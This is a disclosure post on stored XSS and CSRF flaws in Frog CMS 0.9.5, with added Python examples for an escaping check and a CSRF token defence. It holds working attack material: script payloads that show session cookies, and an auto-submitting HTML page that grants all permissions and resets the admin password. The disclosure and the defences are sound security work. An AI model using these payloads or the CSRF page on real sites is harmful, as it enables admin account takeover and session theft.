This vulnerability was reported long ago but is still not patched; the details are below.
Please note that it had already been reported by someone else; I only came to know about it later, so I am publishing it here for information purposes only.
Found the following URLs affected by XSS (vulnerable parameters in parentheses):
- http://127.0.0.1/frog_095/frog_095/admin/?/snippet/add (snippet[name])
- http://127.0.0.1/frog_095/frog_095/admin/?/snippet/add (user[name])
- http://127.0.0.1/frog_095/frog_095/admin/?/snippet/add (page[slug], page[keywords])
P@yl0ads Used for Testing:
- "><script>alert('h@ck3d by eXpl0i13r')</script>
- "><script>alert(document.cookie +'\n'+document.domain)</script>
[Screenshot: Stored XSS payload]
[Screenshot: Stored XSS, cookie disclosed]
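Added example (not part of the original post and not Frog CMS code): a regression check for the stored XSS above, written in Python so it runs offline. It renders the snippet name field the way a vulnerable template would (raw interpolation) and the way a hardened one would (HTML-escaped for an attribute context), feeds in the two payloads listed above, and parses the result with the standard-library HTML parser to see whether anything beyond the intended input element comes out. The function names and the `snippet[name]` input markup are assumptions for illustration.

```python
import html
from html.parser import HTMLParser

# Constructed input: the two payloads listed in the report, as a user could submit
# them in a field such as snippet[name] or user[name].
PAYLOADS = [
    "\"><script>alert('h@ck3d by eXpl0i13r')</script>",
    "\"><script>alert(document.cookie +'\\n'+document.domain)</script>",
]


def render_name_field_unsafe(name: str) -> str:
    """How a vulnerable template renders the stored value: interpolated raw."""
    return f'<input class="textbox" name="snippet[name]" type="text" value="{name}">'


def render_name_field(name: str) -> str:
    """Hardened rendering: HTML-escape the value for an attribute context.
    quote=True also turns " and ' into entities, so the value cannot close the attribute."""
    return (f'<input class="textbox" name="snippet[name]" type="text" '
            f'value="{html.escape(name, quote=True)}">')


class TagCollector(HTMLParser):
    """Records what a browser-like parser actually makes of the markup."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_values = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            # attribute values arrive already entity-decoded
            self.input_values.append(dict(attrs).get("value"))


def parse_markup(markup: str) -> TagCollector:
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector


def has_injected_markup(markup: str) -> bool:
    """True when the rendered field parses into anything beyond the one intended <input>."""
    return parse_markup(markup).tags != ["input"]


if __name__ == "__main__":
    for payload in PAYLOADS:
        print("unsafe :", has_injected_markup(render_name_field_unsafe(payload)))  # True
        print("escaped:", has_injected_markup(render_name_field(payload)))         # False
```

With the raw template the parser sees an `input` followed by a `script` element, which is exactly what the browser executes; with escaping it sees one `input` whose decoded value is the original string, so the data survives intact without becoming markup. The same check applies to any other stored field (user[name], page[slug], page[keywords]).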
This CMS is also vulnerable to a CSRF attack, which can be exploited to change the admin password.
Code:
<html>
<head>
<script type="text/javascript" language="javascript">
function submitform()
{
document.getElementById('myForm').submit();
}
// tick every checkbox inside the #autocheck block
function selectchk()
{
var tab = document.getElementById("autocheck");
var chk = tab.getElementsByTagName("input");
var num = chk.length;
for (var i = 0; i < num; i++)
{
var status = chk[i].getAttribute("type");
if ( status == "checkbox") {
chk[i].checked = true;
}
}
}
</script>
</head>
<body>
<br>
<h1> CSRF Attack by eXpl0i13r </h1>
<br>
<form name="myForm" id="myForm" action="http://127.0.0.1/frog_095/frog_095/admin/?/user/edit/1" method="post">
<input class="textbox" id="user_name" maxlength="100" name="user[name]" size="100" type="text" value="admin">
<input class="textbox" id="user_email" maxlength="255" name="user[email]" size="255" type="text" value="">
<input class="textbox" id="user_username" maxlength="40" name="user[username]" size="40" type="text" value="admin">
<input class="textbox" id="user_password" maxlength="40" name="user[password]" size="40" type="password" value="eXpl0i13r">
<input class="textbox" id="user_confirm" maxlength="40" name="user[confirm]" size="40" type="password" value="eXpl0i13r">
<div id="autocheck">
<input id="user_permission-administrator" name="user_permission[administrator]" type="checkbox" value="1"> <label for="user_permission-administrator">Administrator</label>
<input id="user_permission-developer" name="user_permission[developer]" type="checkbox" value="2"> <label for="user_permission-developer">Developer</label>
<input id="user_permission-editor" name="user_permission[editor]" type="checkbox" value="3"> <label for="user_permission-editor">Editor</label>
</div>
</form>
<script type="text/javascript" language="javascript">
// runs as soon as the page loads: select all permissions, then submit the form
selectchk();
document.myForm.submit();
</script>
</body>
</html>
An attacker can craft such a page and send its link to the victim; the JavaScript submits the form automatically, which changes the admin password.
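Added example (not from the original post and not Frog CMS code; the handler, session id and request shapes are constructed for illustration): the server-side defence that stops the page above, written in Python. The simulated user/edit handler rejects a POST whose Origin (or, failing that, Referer) is not the site's own origin, and additionally requires a per-session synchronizer token, compared in constant time, that a page on another origin can neither read nor compute. The forged request models what the auto-submitted form sends: the admin's session cookie rides along, but the form carries no token and the browser stamps a foreign Origin on it.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Origin of the CMS, taken from the URLs in the report above.
SITE_ORIGIN = "http://127.0.0.1"
# Per-deployment secret; assumed to live in server-side config, never in a page.
SERVER_SECRET = secrets.token_bytes(32)
# Constructed session id standing in for the admin's login cookie.
ADMIN_SESSION = "sess-admin-1234"


def csrf_token(session_id: str) -> str:
    """Per-session token derived with HMAC, so it can be recomputed on each request
    without extra storage and is unknowable to a page on another origin."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def origin_allowed(headers: dict) -> bool:
    """First layer: the request must come from a page on the site's own origin.
    Browsers attach Origin to cross-site POSTs; fall back to Referer if it is absent."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False  # no provenance at all: treat as cross-site
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == SITE_ORIGIN


def handle_user_edit(request: dict) -> tuple:
    """Simulated handler for admin/?/user/edit/<id> (hypothetical request shape:
    a dict with keys method, headers, session_id and form)."""
    if request["method"] != "POST":
        return 405, "method not allowed"
    if not origin_allowed(request["headers"]):
        return 403, "cross-site request rejected"
    expected = csrf_token(request["session_id"])
    supplied = request["form"].get("csrf_token", "")
    # Second layer: constant-time comparison of the synchronizer token.
    if not hmac.compare_digest(expected, supplied):
        return 403, "missing or invalid CSRF token"
    # Only here would user[password] actually be written.
    return 200, "user updated"


def forged_request() -> dict:
    """What the auto-submitting page above produces in the admin's browser (constructed):
    the session cookie is attached automatically, the form carries no token, and the
    browser sets Origin to the attacker's page."""
    return {
        "method": "POST",
        "headers": {"Origin": "http://attacker.invalid"},
        "session_id": ADMIN_SESSION,
        "form": {"user[username]": "admin",
                 "user[password]": "eXpl0i13r", "user[confirm]": "eXpl0i13r"},
    }


def legitimate_request() -> dict:
    """The same change submitted from the CMS's own edit form, which embeds the token."""
    return {
        "method": "POST",
        "headers": {"Origin": SITE_ORIGIN},
        "session_id": ADMIN_SESSION,
        "form": {"user[username]": "admin", "user[password]": "new-secret",
                 "user[confirm]": "new-secret", "csrf_token": csrf_token(ADMIN_SESSION)},
    }


if __name__ == "__main__":
    print(handle_user_edit(forged_request()))      # (403, 'cross-site request rejected')
    print(handle_user_edit(legitimate_request()))  # (200, 'user updated')
```

In a real application the token is emitted as a hidden input in every state-changing form and the check runs on every POST handler, not just user/edit; marking the session cookie `SameSite=Lax` is a further layer, since the browser then omits the cookie from a cross-site auto-submitted POST in the first place.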